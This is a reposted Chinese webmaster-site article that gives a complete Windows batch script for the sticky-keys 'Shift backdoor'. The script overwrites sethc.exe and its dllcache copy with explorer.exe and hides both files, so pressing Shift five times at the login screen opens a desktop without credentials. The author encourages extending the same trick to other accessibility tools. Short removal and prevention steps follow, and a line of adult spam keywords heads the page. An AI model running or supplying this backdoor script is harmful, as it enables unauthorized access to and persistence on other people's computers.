亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 入侵防御 查看內容

shift后門批處理代碼與shift后門清除方法分享

2022-9-26 13:03| 查看: 2614 |來源: 互聯網

在cmd下輸入以下命令... 下面再打開記事本把底下的代碼粘貼進去。 代碼如下: @echo off cls echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ echo. echo Shift后門 echo.spro
在cmd下輸入以下命令...
下面再打開記事本把底下的代碼粘貼進去。

代碼如下:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后門
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執行完畢后,
echo 在終端界面按Shift 5次即可登陸系統!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后門安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其實原理很簡單,就是利用了explorer.exe 這個資源管理器進程替換調用的shift 默認啟動程序,然后還覆蓋了windows的文件保護原文件(防止文件保護系統檢測到文件修改,會還原這些原來的程序,造成copy文件失去作用),當調用shift是其實調用的真正程序是桌面進程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^
下面介紹如何清除此后門...
打開控制面板--輔助功能選項--粘滯鍵--設置--去掉使用快捷鍵的勾

還有要改下copy.exe的權限,不過在這里推薦大家把c盤所有的程序都 改下,只有administrator才能訪問

shift后門的預防解決辦法:預防很簡單的,連敲5次shift,然后在彈出的設置里面取消連滯鍵
已經中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權限或拒絕訪問等,也可:)建議利用前者恢復。。。
收工!
本文最后更新于 2022-9-26 13:03,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部